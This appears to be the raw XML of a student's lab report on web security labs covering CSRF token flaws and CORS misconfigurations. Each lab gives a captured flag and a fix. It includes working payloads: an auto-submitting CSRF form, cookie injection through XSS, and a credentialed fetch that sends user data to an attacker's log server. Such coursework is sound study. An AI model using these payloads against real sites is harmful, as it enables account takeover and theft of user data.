          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;document.forms[0].submit();&lt;/script&gt;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FLAG{CSRF_T0_Updat3_3mails_bFITBfQ8}</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Use CSRF tokens tied to user session. Verify Origin/Referer headers. SameSite=Strict cookie attribute.</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CSRF Token Not Tied to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CSRF token that is not validated against the requesting session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token exists but is not bound to a specific user session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Site has CSRF token but flaw: any valid CSRF token works for any user. Attacker obtains their own valid CSRF token (by loading the form as Laksh), embeds it in the malicious payload along with their session-less exploit. Victim (admin) submits the form with attacker's valid token — server accepts it.</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Fetch CSRF token as Laksh, embed it in exploit payload targeting admin's email update</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FLAG{CSRF_T0_Updat3_3mails_bFITBfQ8}</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CSRF tokens MUST be tied to the specific user session. The token should be generated per-session and validated against that session.</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3: CSRF Token Paired with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CSRF where token is paired with a cookie (not user session)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token paired with cookie, but attacker can inject cookie via XSS</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Token/cookie pair implementation: server checks if CSRF token in POST matches CSRF cookie. Flaw: if attacker can set an arbitrary cookie in victim's browser, they can craft a matching token/cookie pair. Used an XSS vulnerability on the participants search page to inject a cookie of chosen value. Then crafted CSRF payload using that known cookie value and token.</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XSS to inject cookie → CSRF with matching token:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;document.cookie='csrftoken=MYVALUE';&lt;/script&gt; + CSRF form with token=MYVALUE</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FLAG{CSRF_T0_Updat3_3mails_bFITBfQ8}</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Use server-side session-bound CSRF tokens (not cookie-paired). Combine with SameSite=Strict cookies. Defense in depth.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0E6251" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E6251"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 12: CORS Misconfigurations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E6251"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Topic / Vulnerability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 Basic Origin Reflection, Trusted Subdomains via XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Basic Origin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Exploit CORS misconfiguration that reflects any origin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Access-Control-Allow-Origin reflects the request Origin header (trusts any origin)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Target has an API endpoint /userData/ that returns sensitive user info. Its CORS policy reflects whatever Origin is sent and includes Access-Control-Allow-Credentials: true. Crafted JS payload in exploit server: fetch the /userData/ endpoint with credentials, then exfiltrate the response to our log server.</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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch('http://app.bodhitree.com:30000/userData/', {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  credentials: 'include', method: 'GET'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">}).then(r=&gt;r.text()).then(j=&gt;fetch('http://localhost:30001/log/?key='+j));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;</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FLAG{G0t_s3crets_v1a_c0rs_DwbwUfRW}</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Never use wildcard (*) or origin reflection with Allow-Credentials. Use explicit whitelist of trusted origins. Validate against a strict list server-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 2: Trusted Subdomains (CORS + XSS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XSS on a trusted subdomain with CORS to exfiltrate data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Vulnerability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whitelist allows *.bodhitree.com subdomains; XSS exists on one subdomain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Approach / What You Did</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS allows *.bodhitree.com. Attacker doesn't control bodhitree.com directly. But the participants search page has a reflected XSS vulnerability on the same domain. Inject XSS that: (1) fetches /userData/ endpoint (request comes from the trusted subdomain, CORS allows it), (2) receives the response with sensitive data, (3) exfiltrates to the attacker's log server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit / Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Inject XSS via search on app.bodhitree.com that makes credentialed fetch to CORS endpoint and logs response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="27AE60" w:sz="12"/>
        </w:pBdr>
        <w:shd w:fill="E8F5E9" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A6634"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG{G0t_s3crets_v1a_c0rs_DwbwUfRW}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Defense / Fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS on any trusted subdomain breaks CORS subdomain whitelist. Fix underlying XSS first. Avoid wildcard subdomain CORS policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="20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2026-04-18T06:37:12.075Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-18T06:37:12.076Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>